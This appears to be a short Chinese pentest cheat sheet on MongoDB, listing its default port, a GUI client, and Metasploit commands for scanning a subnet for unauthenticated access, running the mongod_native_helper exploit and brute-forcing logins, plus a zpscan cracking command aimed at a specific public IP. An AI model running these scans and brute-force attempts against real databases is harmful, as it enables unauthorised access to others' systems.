Mongodb

目录

• 相关工具
  • GUI
• 渗透
  • 未授权检测
  • 爆破
    • msf
    • zpscan
    • fscan

默认端口27017

相关工具

GUI

推荐使用官方的Mongodb Compass

渗透

未授权检测

use auxiliary/scanner/mongodb/mongodb_login

set rhosts 192.168.90.0/24

set threads 10

exploit

爆破

msf

use exploit/linux/misc/mongod_native_helper

set password 123456

set username test

set rhosts 192.168.253.70

zpscan

/zpscan_darwin crack -i "39.105.195.122:3718|mongodb"

但是未授权的时候，会弹密码是admin:admin，得多多验证一下

fscan